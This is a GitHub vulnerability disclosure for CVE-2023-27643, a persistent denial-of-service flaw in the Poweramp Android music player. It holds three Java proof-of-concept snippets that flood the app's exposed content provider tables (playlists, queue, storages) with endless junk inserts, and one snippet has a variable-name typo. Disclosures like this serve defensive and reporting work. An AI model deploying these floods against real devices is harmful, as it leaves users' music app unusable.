Skip to content
Permalink
main
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Go to file
 
 
Cannot retrieve contributors at this time

Denial of Service exists in POWERAMP(CVE-2023-27643)

Vendor:POWERAMP(https://powerampapp.com/)

Affected product:Poweramp (com.maxmpz.audioplayer)

Version:build-954-uni

Download link:https://play.google.com/store/apps/details?id=com.maxmpz.audioplayer

Description of the vulnerability for use in the CVE:An issue found in POWERAMP 925-bundle-play and Poweramp 954-uni allows a remote attacker to cause a denial of service via the Rescan button in Queue and Select Folders button in Library.

Additional information:Poweramp application is a famous music player used in Android system. When the user triggers some action, it loads the relevant data stored in the database into the memory. If a malicious app injects a large amount of data into the database, the Poweramp app will crash because of loading this data. Even worse, users cannot fix this security issue by simply restarting the application, and the Poweramp application will still not be able to respond to any user requests when certain actions are triggered to load the database.

1.After inserting a large amount of data into the database, it will cause the APP to take too long to load and fall into unresponsive state (the length depends on the size of the injected data), and the main page is in DoS state at this time.

poc:

public void attack(){
        ContentResolver contentResolver = this.getApplicationContext().getContentResolver();
        Uri uri = Uri.parse("content://com.maxmpz.audioplayer.data/playlists");
        while (true) {
            ContentValues contentValues = new ContentValues();
            String randomString = getRandomString(5120);
            contentValues.put("playlist",randomString);
            contentValues.put("playlist_path",randomString);
            contentResolver.insert(uri,contentValues);
        }
    }

image-20230410152852696

2.After inserting a large amount of data into the database, when the user clicks the Rescan button in the Queue, the APP will read the queue table from the database, resulting in a DoS attack.

poc:

    public void attack(){
        ContentResolver contentResolver = this.getApplicationContext().getContentResolver();
        Uri uri = Uri.parse("content://com.maxmpz.audioplayer.data/queue");
        while (true) {
            ContentValues contentValues = new ContentValues();
            contentValues.put("folder_file_id",1);
            contentResolver.insert(uri,contentValues);
        }
    }

image-20230410153051062

3.After inserting a large amount of data into the database, persistent DoS is triggered when the user clicks the Select Folders button.

poc:

    public void attack(){
        ContentResolver contentResolver = this.getApplicationContext().getContentResolver();
        Uri uri = Uri.parse("content://com.maxmpz.audioplayer.data/storages");
        while (true) {
            ContentValues contentValues = new ContentValues();
          	String randomString = getRandomString(5120);
            contentValues.put("path",randomstring);
          	contentValues.put("path_hash",randomstring);
            contentResolver.insert(uri,contentValues);
        }
    }

image-20230410153152922